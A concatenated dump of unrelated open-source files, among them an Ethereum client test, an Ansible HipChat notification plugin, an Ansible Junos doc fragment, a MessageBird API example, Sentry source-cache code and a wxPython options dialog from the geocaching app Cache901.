assert len(block['transactions']) == 0
assert block['logsBloom'] == b"0x" + b"00" * 256
def test_get_block_with_transactions(client, hex_accounts):
tx_hash = client.send_transaction(
_from=hex_accounts[0],
to=hex_accounts[1],
value=1234,
data="0x1234",
gas=100000,
)
tx_receipt = client.get_transaction_receipt(tx_hash)
assert tx_receipt
assert tx_receipt['transactionHash'] == tx_hash
block_number = tx_receipt['blockNumber']
block = client.get_block_by_number(block_number)
assert len(block['transactions']) == 1
|
rwl/muntjac
|
refs/heads/master
|
muntjac/addon/invient/__init__.py
|
12133432
| |
kencung/configuration
|
refs/heads/master
|
playbooks/callback_plugins/hipchat_plugin.py
|
51
|
import os
import time
from ansible import utils
try:
import prettytable
except ImportError:
prettytable = None
try:
import hipchat
except ImportError:
hipchat = None
class CallbackModule(object):
"""Send status updates to a HipChat channel during playbook execution.
This plugin makes use of the following environment variables:
HIPCHAT_TOKEN (required): HipChat API token
HIPCHAT_ROOM (optional): HipChat room to post in. Default: ansible
HIPCHAT_FROM (optional): Name to post as. Default: ansible
HIPCHAT_NOTIFY (optional): Add notify flag to important messages ("true" or "false"). Default: true
HIPCHAT_MSG_PREFIX (option): Optional prefix to add to all hipchat messages
HIPCHAT_MSG_COLOR (option): Optional color for hipchat messages
HIPCHAT_CONDENSED (option): Condense the task summary output
Requires:
prettytable
"""
def __init__(self):
self.enabled = "HIPCHAT_TOKEN" in os.environ
if not self.enabled:
return
# make sure we got our imports
if not hipchat:
raise ImportError(
"The hipchat plugin requires the hipchat Python module, "
"which is not installed or was not found."
)
if not prettytable:
raise ImportError(
"The hipchat plugin requires the prettytable Python module, "
"which is not installed or was not found."
)
self.start_time = time.time()
self.task_report = []
self.last_task = None
self.last_task_changed = False
self.last_task_count = 0
self.last_task_delta = 0
self.last_task_start = time.time()
self.condensed_task_report = (os.getenv('HIPCHAT_CONDENSED', True) == True)
self.room = os.getenv('HIPCHAT_ROOM', 'ansible')
self.from_name = os.getenv('HIPCHAT_FROM', 'ansible')
self.allow_notify = (os.getenv('HIPCHAT_NOTIFY') != 'false')
try:
self.hipchat_conn = hipchat.HipChat(token=os.getenv('HIPCHAT_TOKEN'))
except Exception as e:
utils.warning("Unable to connect to hipchat: {}".format(e))
self.hipchat_msg_prefix = os.getenv('HIPCHAT_MSG_PREFIX', '')
self.hipchat_msg_color = os.getenv('HIPCHAT_MSG_COLOR', '')
self.printed_playbook = False
self.playbook_name = None
def _send_hipchat(self, message, room=None, from_name=None, color=None, message_format='text'):
if not room:
room = self.room
if not from_name:
from_name = self.from_name
if not color:
color = self.hipchat_msg_color
try:
self.hipchat_conn.message_room(room, from_name, message, color=color, message_format=message_format)
except Exception as e:
utils.warning("Could not submit message to hipchat: {}".format(e))
def _flush_last_task(self):
if self.last_task:
delta = time.time() - self.last_task_start
self.task_report.append(dict(
changed=self.last_task_changed,
count=self.last_task_count,
delta="{:0>.1f}".format(self.last_task_delta),
task=self.last_task))
self.last_task_count = 0
self.last_task_changed = False
self.last_task = None
self.last_task_delta = 0
def _process_message(self, msg, msg_type='STATUS'):
if msg_type == 'OK' and self.last_task:
if msg.get('changed', True):
self.last_task_changed = True
if msg.get('delta', False):
(hour, minute, sec) = msg['delta'].split(':')
total = float(hour) * 1200 + float(minute) * 60 + float(sec)
self.last_task_delta += total
self.last_task_count += 1
else:
self._flush_last_task()
if msg_type == 'TASK_START':
self.last_task = msg
self.last_task_start = time.time()
elif msg_type == 'FAILED':
self.last_task_start = time.time()
if 'msg' in msg:
self._send_hipchat('/code {}: The ansible run returned the following error:\n\n {}'.format(
self.hipchat_msg_prefix, msg['msg']), color='red', message_format='text')
else:
# move forward the last task start time
self.last_task_start = time.time()
def on_any(self, *args, **kwargs):
pass
def runner_on_failed(self, host, res, ignore_errors=False):
if self.enabled:
self._process_message(res, 'FAILED')
def runner_on_ok(self, host, res):
if self.enabled:
# don't send the setup results
if res['invocation']['module_name'] != "setup":
self._process_message(res, 'OK')
def runner_on_error(self, host, msg):
if self.enabled:
self._process_message(msg, 'ERROR')
def runner_on_skipped(self, host, item=None):
if self.enabled:
self._process_message(item, 'SKIPPED')
def runner_on_unreachable(self, host, res):
pass
def runner_on_no_hosts(self):
pass
def runner_on_async_poll(self, host, res, jid, clock):
if self.enabled:
self._process_message(res, 'ASYNC_POLL')
def runner_on_async_ok(self, host, res, jid):
if self.enabled:
self._process_message(res, 'ASYNC_OK')
def runner_on_async_failed(self, host, res, jid):
if self.enabled:
self._process_message(res, 'ASYNC_FAILED')
def playbook_on_start(self):
pass
def playbook_on_notify(self, host, handler):
pass
def playbook_on_no_hosts_matched(self):
pass
def playbook_on_no_hosts_remaining(self):
pass
def playbook_on_task_start(self, name, is_conditional):
if self.enabled:
self._process_message(name, 'TASK_START')
def playbook_on_vars_prompt(self, varname, private=True, prompt=None,
encrypt=None, confirm=False, salt_size=None,
salt=None, default=None):
pass
def playbook_on_setup(self):
pass
def playbook_on_import_for_host(self, host, imported_file):
pass
def playbook_on_not_import_for_host(self, host, missing_file):
pass
def playbook_on_play_start(self, pattern):
if self.enabled:
"""Display Playbook and play start messages"""
self.start_time = time.time()
self.playbook_name, _ = os.path.splitext(os.path.basename(self.play.playbook.filename))
host_list = self.play.playbook.inventory.host_list
inventory = os.path.basename(os.path.realpath(host_list))
subset = self.play.playbook.inventory._subset
msg = "<b>{description}</b>: Starting ansible run for play <b><i>{play}</i></b>".format(description=self.hipchat_msg_prefix, play=self.playbook_name)
if self.play.playbook.only_tags and 'all' not in self.play.playbook.only_tags:
msg = msg + " with tags <b><i>{}</i></b>".format(','.join(self.play.playbook.only_tags))
if subset:
msg = msg + " on hosts <b><i>{}</i></b>".format(','.join(subset))
self._send_hipchat(msg, message_format='html')
def playbook_on_stats(self, stats):
if self.enabled:
self._flush_last_task()
delta = time.time() - self.start_time
self.start_time = time.time()
"""Display info about playbook statistics"""
hosts = sorted(stats.processed.keys())
task_column = '{} - Task'.format(self.hipchat_msg_prefix)
task_summary = prettytable.PrettyTable([task_column, 'Time', 'Count', 'Changed'])
task_summary.align[task_column] = "l"
task_summary.align['Time'] = "r"
task_summary.align['Count'] = "r"
task_summary.align['Changed'] = "r"
for task in self.task_report:
if self.condensed_task_report:
# for the condensed task report skip all tasks
# that are not marked as changed and that have
# a time delta less than 1
if not task['changed'] and float(task['delta']) < 1:
continue
task_summary.add_row([task['task'], task['delta'], str(task['count']), str(task['changed'])])
summary_table = prettytable.PrettyTable(['Ok', 'Changed', 'Unreachable', 'Failures'])
self._send_hipchat("/code " + str(task_summary) )
summary_all_host_output = []
for host in hosts:
stats = stats.summarize(host)
summary_output = "<b>{}</b>: <i>{}</i> - ".format(self.hipchat_msg_prefix, host)
for summary_item in ['ok', 'changed', 'unreachable', 'failures']:
if stats[summary_item] != 0:
summary_output += "<b>{}</b> - {} ".format(summary_item, stats[summary_item])
summary_all_host_output.append(summary_output)
self._send_hipchat("<br />".join(summary_all_host_output), message_format='html')
msg = "<b>{description}</b>: Finished Ansible run for <b><i>{play}</i> in {min:02} minutes, {sec:02} seconds</b><br /><br />".format(
description=self.hipchat_msg_prefix,
play=self.playbook_name,
min=int(delta / 60),
sec=int(delta % 60))
self._send_hipchat(msg, message_format='html')
|
JetBrains/intellij-community
|
refs/heads/master
|
python/testData/refactoring/makeFunctionTopLevel/methodNotImportableDestinationFile/before/main.py
|
31
|
class C:
def met<caret>hod(self):
pass
C().method()
|
anryko/ansible
|
refs/heads/devel
|
lib/ansible/plugins/doc_fragments/junos.py
|
44
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Peter Sprygada <psprygada@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# Standard files documentation fragment
DOCUMENTATION = r'''
options:
provider:
description:
- B(Deprecated)
- "Starting with Ansible 2.5 we recommend using C(connection: network_cli) or C(connection: netconf)."
- For more information please see the L(Junos OS Platform Options guide, ../network/user_guide/platform_junos.html).
- HORIZONTALLINE
- A dict object containing connection details.
type: dict
suboptions:
host:
description:
- Specifies the DNS host name or address for connecting to the remote
device over the specified transport. The value of host is used as
the destination address for the transport.
type: str
required: true
port:
description:
- Specifies the port to use when building the connection to the remote
device. The port value will default to the well known SSH port
of 22 (for C(transport=cli)) or port 830 (for C(transport=netconf))
device.
type: int
default: 22
username:
description:
- Configures the username to use to authenticate the connection to
the remote device. This value is used to authenticate
the SSH session. If the value is not specified in the task, the
value of environment variable C(ANSIBLE_NET_USERNAME) will be used instead.
type: str
password:
description:
- Specifies the password to use to authenticate the connection to
the remote device. This value is used to authenticate
the SSH session. If the value is not specified in the task, the
value of environment variable C(ANSIBLE_NET_PASSWORD) will be used instead.
type: str
timeout:
description:
- Specifies the timeout in seconds for communicating with the network device
for either connecting or sending commands. If the timeout is
exceeded before the operation is completed, the module will error.
type: int
default: 10
ssh_keyfile:
description:
- Specifies the SSH key to use to authenticate the connection to
the remote device. This value is the path to the key
used to authenticate the SSH session. If the value is not specified in
the task, the value of environment variable C(ANSIBLE_NET_SSH_KEYFILE)
will be used instead.
type: path
notes:
- For information on using CLI and netconf see the :ref:`Junos OS Platform Options guide <junos_platform_options>`
- For more information on using Ansible to manage network devices see the :ref:`Ansible Network Guide <network_guide>`
- For more information on using Ansible to manage Juniper network devices see U(https://www.ansible.com/ansible-juniper).
'''
|
messagebird/python-rest-api
|
refs/heads/master
|
examples/call_delete.py
|
1
|
#!/usr/bin/env python
import os
import sys
import json
import argparse
import requests
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import messagebird
parser = argparse.ArgumentParser(usage='call_create.py\
--accessKey="*******" \
--callId=dda20377-72da-4846-9b2c-0fea3ad4bcb6 \
')
parser.add_argument('--accessKey', help='Access key for MessageBird API.', type=str, required=True)
parser.add_argument('--callId', help='The ID of the MessageBird call to delete.', type=str, required=True)
args = vars(parser.parse_args())
try:
# Create a MessageBird client with the specified accessKey.
client = messagebird.Client(args['accessKey'])
# Create a call for the specified callID.
call = client.call_delete(args['callId'])
# If no error is thrown, means delete was successful.
print('\nDeleted call with id `%s` successfully!' % args['callId'])
except messagebird.client.ErrorException as e:
print('\nAn error occurred while creating a call:\n')
for error in e.errors:
print(' code : %d' % error.code)
print(' description : %s' % error.description)
print(' parameter : %s' % error.parameter)
print(' type : %s' % error.__class__)
except requests.exceptions.HTTPError as e:
print('\nAn http exception occurred while deleting a call:')
print(' ', e)
print(' Http request body: ', e.request.body)
print(' Http response status: ', e.response.status_code)
print(' Http response body: ', e.response.content.decode())
except Exception as e:
print('\nAn ', e.__class__, ' exception occurred while deleting a call:')
print(e)
|
gencer/sentry
|
refs/heads/master
|
src/sentry/lang/javascript/cache.py
|
3
|
from __future__ import absolute_import, print_function
from six import text_type
from symbolic import SourceView
from sentry.utils.strings import codec_lookup
__all__ = ['SourceCache', 'SourceMapCache']
def is_utf8(codec):
name = codec_lookup(codec).name
return name in ('utf-8', 'ascii')
class SourceCache(object):
def __init__(self):
self._cache = {}
self._errors = {}
self._aliases = {}
def __contains__(self, url):
url = self._get_canonical_url(url)
return url in self._cache
def _get_canonical_url(self, url):
if url in self._aliases:
url = self._aliases[url]
return url
def get(self, url):
return self._cache.get(self._get_canonical_url(url))
def get_errors(self, url):
url = self._get_canonical_url(url)
return self._errors.get(url, [])
def alias(self, alias, target):
if alias != target:
self._aliases[alias] = target
def add(self, url, source, encoding=None):
url = self._get_canonical_url(url)
if not isinstance(source, SourceView):
if isinstance(source, text_type):
source = source.encode('utf-8')
# If an encoding is provided and it's not utf-8 compatible
# we try to re-encoding the source and create a source view
# from it.
elif encoding is not None and not is_utf8(encoding):
try:
source = source.decode(encoding).encode('utf-8')
except UnicodeError:
pass
source = SourceView.from_bytes(source)
self._cache[url] = source
def add_error(self, url, error):
url = self._get_canonical_url(url)
self._errors.setdefault(url, [])
self._errors[url].append(error)
class SourceMapCache(object):
def __init__(self):
self._cache = {}
self._mapping = {}
def __contains__(self, sourcemap_url):
return sourcemap_url in self._cache
def link(self, url, sourcemap_url):
self._mapping[url] = sourcemap_url
def add(self, sourcemap_url, sourcemap_view):
self._cache[sourcemap_url] = sourcemap_view
def get(self, sourcemap_url):
return self._cache.get(sourcemap_url)
def get_link(self, url):
sourcemap_url = self._mapping.get(url)
if sourcemap_url:
sourcemap = self.get(sourcemap_url)
return (sourcemap_url, sourcemap)
return (None, None)
|
RossBrunton/django
|
refs/heads/master
|
django/contrib/redirects/__init__.py
|
808
|
default_app_config = 'django.contrib.redirects.apps.RedirectsConfig'
|
turbomanage/training-data-analyst
|
refs/heads/master
|
courses/machine_learning/deepdive2/structured/solutions/serving/application/appengine_config.py
|
25
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from google.appengine.ext import vendor
vendor.add('lib')
|
rboman/progs
|
refs/heads/master
|
sandbox/fortranpython/test1/scripts/calcul1.py
|
1
|
import numpy as np
import math
import vect
print(dir(vect))
vect.norme(math.sin(0.5),math.cos(0.5))
print("----fib----")
print(vect.fib.__doc__)
a = np.zeros(8,'d')
vect.fib(a)
print(a)
print("----fib2----")
print(vect.fib2.__doc__)
print(vect.fib2(10))
print("retour a python")
|
IllusionRom-deprecated/android_platform_tools_idea
|
refs/heads/master
|
python/testData/inspections/PyClassHasNoInitInspection/unresolvedParent.py
|
83
|
__author__ = 'ktisha'
class B(ABC):
def foo(self):
self.b = 1
|
pedersen/cache901
|
refs/heads/master
|
cache901/options.py
|
1
|
"""
Cache901 - GeoCaching Software for the Asus EEE PC 901
Copyright (C) 2007, Michael J. Pedersen <m.pedersen@icelus.org>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
import os
import os.path
import serial
import wx
from sqlalchemy import and_
import cache901
import cache901.ui_xrc
import cache901.util
import cache901.validators
from cache901 import sadbobjects
import gpsbabel
class OptionsUI(cache901.ui_xrc.xrcOptionsUI):
def __init__(self, listOfCaches, parent=None):
cache901.ui_xrc.xrcOptionsUI.__init__(self, parent)
self.colsRearranged = False
self.gpsbabelLoc.SetValidator(cache901.validators.cmdValidator())
self.gpsPort.SetValidator(cache901.validators.portValidator())
self.gpsType.SetValidator(cache901.validators.gpsTypeValidator())
self.coordDisplay.SetValidator(cache901.validators.degDisplayValidator())
self.locSplit.SetValidator(cache901.validators.splitValidator("optsplitloc"))
self.acctTabSplit.SetValidator(cache901.validators.splitValidator("optsplitacct"))
self.maxLogs.SetValidator(cache901.validators.spinCtlValidator("dbMaxLogs"))
w,h = self.GetTextExtent("QQQQQQQQQQQQQQQQQQ")
self.cacheDays.InsertColumn(0, 'Cache Day', width=w)
self.cachesForDay.InsertColumn(0, 'Caches For Day', width=w)
self.availCaches.InsertColumn(0, 'Available Caches', width=w)
self.accountNames.InsertColumn(0, 'GeoCaching Accounts', width=w)
isinstance(listOfCaches, wx.ListCtrl)
idx = 0
while idx < listOfCaches.GetItemCount():
cache_item = listOfCaches.GetItem(idx, 2)
ctext = cache_item.GetText()
iid = self.availCaches.Append((ctext, ))
self.availCaches.SetItemData(iid, listOfCaches.GetItemData(idx))
idx = idx + 1
self.loadOrigins()
self.listCacheDays()
self.loadAccounts()
self.loadGUIPreferences()
self.Bind(wx.EVT_BUTTON, self.OnRemoveOrigin, self.remLoc)
self.Bind(wx.EVT_BUTTON, self.OnAddOrigin, self.addLoc)
self.Bind(wx.EVT_BUTTON, self.OnClearSelection, self.clearSel)
self.Bind(wx.EVT_BUTTON, self.OnGetFromGPS, self.getFromGPS)
self.Bind(wx.EVT_BUTTON, self.OnAddCacheDay, self.addCacheDay)
self.Bind(wx.EVT_BUTTON, self.OnRemCacheDay, self.remCacheDay)
self.Bind(wx.EVT_BUTTON, self.OnCacheUp, self.upCache)
self.Bind(wx.EVT_BUTTON, self.OnCacheDown, self.downCache)
self.Bind(wx.EVT_BUTTON, self.OnAddCache, self.addCache)
self.Bind(wx.EVT_BUTTON, self.OnRemCache, self.remCache)
self.Bind(wx.EVT_BUTTON, self.OnRenameCacheDay, self.btnRenameCacheDay)
self.Bind(wx.EVT_BUTTON, self.OnAddAccount, self.btnAddAcount)
self.Bind(wx.EVT_BUTTON, self.OnRemAccount, self.btnRemAccount)
self.Bind(wx.EVT_BUTTON, self.OnSaveAccount, self.btnSaveAccount)
self.Bind(wx.EVT_BUTTON, self.OnColMoveUp, self.colMoveUpButton)
self.Bind(wx.EVT_BUTTON, self.OnColMoveDown, self.colMoveDownButton)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnLoadOrigin, self.locations)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnLoadCacheDay, self.cacheDays)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnLoadAccount, self.accountNames)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnColumnSelect, self.colOrderList)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnColumnDeselect, self.colOrderList)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnAddCache, self.availCaches)
def loadAccounts(self):
self.accountNames.DeleteAllItems()
for acct in cache901.db().query(sadbobjects.Accounts):
aid = self.accountNames.Append(('%s@%s' % (acct.username, acct.sitename), ))
self.accountNames.SetItemData(aid, acct.accountid)
self.btnRemAccount.Disable()
self.acctType.Disable()
self.acctType.SetSelection(0)
self.acctUsername.Disable()
self.acctUsername.SetValue('')
self.acctPassword.Disable()
self.acctPassword.SetValue('')
self.acctIsPremium.Disable()
self.acctIsPremium.SetValue(False)
self.acctIsTeam.Disable()
self.acctIsTeam.SetValue(False)
self.btnSaveAccount.Disable()
def loadOrigins(self):
self.locations.DeleteAllItems()
self.locations.DeleteAllColumns()
w,h = self.GetTextExtent("QQQQQQQQQQQQQQQQQQ")
self.locations.InsertColumn(0, 'Location Name', width=w)
for loc in cache901.util.getSearchLocs():
sid = self.locations.Append((loc.name,))
self.locations.SetItemData(sid, loc.wpt_id)
def loadGUIPreferences(self):
# get the current column order list from the config
cfg = cache901.cfg()
orderList = cfg.cachecolumnorder
for column in orderList:
self.colOrderList.InsertStringItem(orderList.index(column), column)
def OnAddAccount(self, evt):
acct = cache901.sadbobjects.Accounts()
acct.username = 'unknown'
acct.password = ''
acct.ispremium = False
acct.isteam = False
acct.sitename = self.acctType.GetItems()[0]
cache901.db().add(acct)
cache901.db().commit()
self.loadAccounts()
self.accountNames.Select(self.accountNames.FindItemData(0, acct.accountid))
def OnRemAccount(self, evt):
acctid = self.accountNames.GetFirstSelected()
if acctid > -1:
acct = cache901.db().query(sadbobjects.Accounts).get(self.accountNames.GetItemData(acctid))
cache901.db().delete(acct)
cache901.db().commit()
self.loadAccounts()
def OnLoadAccount(self, evt):
acctid = self.accountNames.GetFirstSelected()
if acctid > -1:
acct = cache901.db().query(sadbobjects.Accounts).get(self.accountNames.GetItemData(acctid))
self.btnRemAccount.Enable()
self.acctType.Enable()
self.acctType.SetValue(acct.sitename)
self.acctUsername.Enable()
self.acctUsername.SetValue(acct.username)
self.acctPassword.Enable()
self.acctPassword.SetValue(acct.password)
self.acctIsPremium.Enable()
self.acctIsPremium.SetValue(acct.ispremium)
self.acctIsTeam.Enable()
self.acctIsTeam.SetValue(acct.isteam)
self.btnSaveAccount.Enable()
def OnSaveAccount(self, evt):
acctid = self.accountNames.GetFirstSelected()
if acctid > -1:
acct = cache901.db().query(sadbobjects.Accounts).get(self.accountNames.GetItemData(acctid))
acct.sitename = self.acctType.GetValue()
acct.username = self.acctUsername.GetValue()
acct.password = self.acctPassword.GetValue()
acct.ispremium = self.acctIsPremium.GetValue()
acct.isteam = self.acctIsTeam.GetValue()
cache901.db().commit()
self.loadAccounts()
def showGeneral(self):
self.tabs.ChangeSelection(0)
self.ShowModal()
def showSearch(self):
self.tabs.ChangeSelection(1)
self.ShowModal()
def showCacheDay(self):
self.tabs.ChangeSelection(2)
self.ShowModal()
def showGeoAccounts(self):
self.tabs.ChangeSelection(3)
self.ShowModal()
def showGuiPrefs(self):
self.tabs.ChangeSelection(4)
self.ShowModal()
def OnRemoveOrigin(self, evt):
sel = self.locations.GetFirstSelected()
wptid = self.locations.GetItemData(sel)
for loc in cache901.db().query(sadbobjects.Locations).filter(
and_(
sadbobjects.Locations.loc_type == 2,
sadbobjects.Locations.wpt_id == wptid,
)):
cache901.db().delete(loc)
cache901.db().commit()
self.loadOrigins()
cache901.db().commit()
def OnAddOrigin(self, evt):
lid = self.locations.GetFirstSelected()
if lid != -1:
lid = self.locations.GetItemData(lid)
else:
lid = -999999
wpt = cache901.db().query(sadbobjects.Locations).get(lid)
if wpt is None:
wpt = sadbobjects.Locations()
cache901.db().add(wpt)
wpt.name = self.locName.GetValue()
wpt.loc_type = 2
if len(wpt.name) != 0:
failed = False
try:
wpt.lat = str(cache901.util.dmsToDec(self.latitude.GetValue()))
self.latitude.SetValue(wpt.lat)
except cache901.util.InvalidDegFormat, msg:
wx.MessageBox(str(msg), "Invalid Latitude", parent=self)
failed = True
try:
wpt.lon = str(cache901.util.dmsToDec(self.longitude.GetValue()))
self.longitude.SetValue(wpt.lon)
except cache901.util.InvalidDegFormat, msg:
wx.MessageBox(str(msg), "Invalid Longitude", parent=self)
failed = True
if not failed:
cache901.db().commit()
self.loadOrigins()
wpt_id = self.locations.FindItemData(0, wpt.wpt_id)
if wpt_id >= 0:
self.locations.Select(wpt_id)
else:
self.locName.SetValue("")
self.latitude.SetValue("")
self.longitude.SetValue("")
else:
wx.MessageBox("Empty names cannot be saved", "Empty Name Error")
def OnLoadOrigin(self, evt):
wptid = evt.GetData()
wpt = cache901.db().query(sadbobjects.Locations).get(wptid)
self.locName.SetValue(wpt.name)
self.latitude.SetValue(cache901.util.latToDMS(wpt.lat))
self.longitude.SetValue(cache901.util.lonToDMS(wpt.lon))
def OnClearSelection(self, evt):
lid = self.locations.GetFirstSelected()
while lid != -1:
self.locations.Select(lid, False)
lid = self.locations.GetFirstSelected()
def OnGetFromGPS(self, evt):
# Get the path for GPSBabel, and make sure it's in use.
fp = self.gpsbabelLoc.GetPath()
gpsbabel.gps = gpsbabel.GPSBabel(fp)
# Get the port the GPS is attached to
selnum = self.gpsPort.GetSelection()
if selnum == wx.NOT_FOUND:
wx.MessageBox('Please select the GPS Port on the "General" page', 'Invalid GPS Port')
items = self.gpsPort.GetItems()
if selnum < 0 or selnum >= len(items):
wx.MessageBox('Please select the GPS Port on the "General" page', 'Invalid GPS Port')
else:
port = items[selnum]
if port == 'USB': port = 'usb:'
# Get the type of GPS
selnum = self.gpsType.GetSelection()
if selnum == wx.NOT_FOUND:
wx.MessageBox('Please select the GPS Type on the "General" page', 'Invalid GPS Type')
items = self.gpsType.GetItems()
if selnum < 0 or selnum >= len(items):
wx.MessageBox('Please select the GPS Type on the "General" page', 'Invalid GPS Type')
else:
gpstype = items[selnum].lower()
try:
wpt = gpsbabel.gps.getCurrentGpsLocation(port, gpstype)
self.latitude.SetValue(cache901.util.latToDMS(wpt.lat))
self.longitude.SetValue(cache901.util.lonToDMS(wpt.lon))
except Exception, e:
wx.MessageBox(str(e), "An Error Occured")
def listCacheDays(self):
self.cacheDays.DeleteAllItems()
for cday in cache901.db().query(sadbobjects.CacheDayNames).order_by(sadbobjects.CacheDayNames.dayname):
self.cacheDays.Append((cday.dayname, ))
if self.cacheDays.GetItemCount() > 0:
self.cacheDays.Select(0)
self.OnLoadCacheDay(None)
def OnAddCacheDay(self, evt):
newname = wx.GetTextFromUser('New Cache Day:', 'Enter The Name', parent=self)
if newname != '':
day = sadbobjects.CacheDayNames()
day.dayname = newname
sadbobjects.DBSession.add(day)
cache901.db().commit()
self.listCacheDays()
def OnRemCacheDay(self, evt):
iid = self.cacheDays.GetFirstSelected()
while iid != -1:
dname = self.cacheDays.GetItemText(iid)
day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
if wx.MessageBox('Really delete cache day %s?' % dname, 'Remove Cache Day', style=wx.YES_NO, parent=self) == wx.YES:
cache901.db().delete(day)
iid = self.cacheDays.GetNextSelected(iid)
self.listCacheDays()
def OnRenameCacheDay(self, evt):
iid=self.cacheDays.GetFirstSelected()
if iid != -1:
dname = self.cacheDays.GetItemText(iid)
newdname = wx.GetTextFromUser('Rename %s to what?' % dname, 'Rename Cache Day').strip()
if newdname != '':
day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
day.dayname = newdname
for c in day.caches:
c.dayname = newdname
cache901.db().commit()
self.listCacheDays()
else:
wx.MessageBox('Cowardly refusing to rename a day to an empty name', 'Bad Cache Day Name', wx.ICON_EXCLAMATION)
def OnCacheUp(self, evt):
iid = self.cacheDays.GetFirstSelected()
dname = self.cacheDays.GetItemText(iid)
day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
iid = self.cachesForDay.GetFirstSelected()
if iid > 0:
cache = day.caches[iid]
del day.caches[iid]
day.caches.insert(iid-1, cache)
day.reindex()
cache901.db().commit()
self.OnLoadCacheDay(evt)
self.cachesForDay.Select(iid-1)
def OnCacheDown(self, evt):
iid = self.cacheDays.GetFirstSelected()
dname = self.cacheDays.GetItemText(iid)
day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
iid = self.cachesForDay.GetFirstSelected()
if iid < len(day.caches)-1:
cache = day.caches[iid]
del day.caches[iid]
day.caches.insert(iid+1, cache)
day.reindex()
cache901.db().commit()
self.OnLoadCacheDay(evt)
self.cachesForDay.Select(iid+1)
def OnAddCache(self, evt):
iid = self.cacheDays.GetFirstSelected()
dname = self.cacheDays.GetItemText(iid)
day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
if not day:
return
iid = self.availCaches.GetFirstSelected()
while iid != -1:
waypoint = sadbobjects.CacheDay()
cache = cache901.db().query(sadbobjects.Caches).get(self.availCaches.GetItemData(iid))
waypoint.cache_id = cache.cache_id
waypoint.cache_type = 1
day.caches.append(waypoint)
iid = self.availCaches.GetNextSelected(iid)
cache901.db().commit()
self.OnLoadCacheDay(evt)
def OnRemCache(self, evt):
iid = self.cacheDays.GetFirstSelected()
dname = self.cacheDays.GetItemText(iid)
day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
iid = self.cachesForDay.GetFirstSelected()
delme = []
while iid != -1:
delme.append(iid)
iid = self.cachesForDay.GetNextSelected(iid)
delme.reverse()
for idx in delme:
cache901.db().delete(day.caches[idx])
cache901.db().commit()
self.OnLoadCacheDay(evt)
def OnLoadCacheDay(self, evt):
iid = self.cacheDays.GetFirstSelected()
dname = self.cacheDays.GetItemText(iid)
day = cache901.db().query(sadbobjects.CacheDayNames).get(dname)
self.cachesForDay.DeleteAllItems()
for cache in day.caches:
if cache.cache_type == 1:
iid = self.cachesForDay.Append((cache.cache.url_name, ))
self.cachesForDay.SetItemData(iid, cache.cache_id)
elif cache.cache_type == 2:
iid = self.cachesForDay.Append((cache.loc.name, ))
self.cachesForDay.SetItemData(iid, cache.cache_id)
def OnColMoveUp(self, evt):
index = self.colOrderList.GetFirstSelected()
newIndex = index - 1
itemText = self.colOrderList.GetItemText(index)
self.colOrderList.DeleteItem(index)
self.colOrderList.InsertStringItem(newIndex, itemText)
self.colOrderList.Select(newIndex)
self.saveColumnOrder()
def OnColMoveDown(self, evt):
index = self.colOrderList.GetFirstSelected()
newIndex = index + 1
itemText = self.colOrderList.GetItemText(index)
self.colOrderList.DeleteItem(index)
self.colOrderList.InsertStringItem(newIndex, itemText)
self.colOrderList.Select(newIndex)
self.saveColumnOrder()
def OnColumnSelect(self, evt):
maxIndex = self.colOrderList.GetItemCount()
index = self.colOrderList.GetFirstSelected()
if index == 0:
self.colMoveUpButton.Disable()
self.colMoveDownButton.Enable()
elif index == maxIndex - 1:
self.colMoveUpButton.Enable()
self.colMoveDownButton.Disable()
else:
self.colMoveUpButton.Enable()
self.colMoveDownButton.Enable()
def OnColumnDeselect(self, evt):
index = self.colOrderList.GetFirstSelected()
if index == -1:
self.colMoveUpButton.Disable()
self.colMoveDownButton.Disable()
def saveColumnOrder(self):
# get the column titles in the order they appear now
newOrderList = map(lambda idx: self.colOrderList.GetItemText(idx), range(self.colOrderList.GetItemCount()))
# save the new order list to the config
cfg = cache901.cfg()
cfg.cachecolumnorder = newOrderList
self.colsRearranged = True
def forWingIde(self):
"""
This method shouldn't ever be called, since it's a do nothing
method. However, by having it in here, Wing IDE can provide
autocompletion, and it won't interfere with anything else, so here
it is.
"""
# Overall Dialog
isinstance(self.tabs, wx.Notebook)
# General Tab
isinstance(self.general, wx.Panel)
isinstance(self.coordDisplay, wx.Choice)
isinstance(self.gpsType, wx.Choice)
isinstance(self.gpsPort, wx.Choice)
isinstance(self.gpsbabelLoc, wx.FilePickerCtrl)
isinstance(self.gpsbabelPath, wx.StaticText)
isinstance(self.getFromGPS, wx.Button)
isinstance(self.maxLogs, wx.SpinCtrl)
# Search Tab
isinstance(self.search, wx.Panel)
isinstance(self.locations, wx.ListCtrl)
isinstance(self.locName, wx.TextCtrl)
isinstance(self.latitude, wx.TextCtrl)
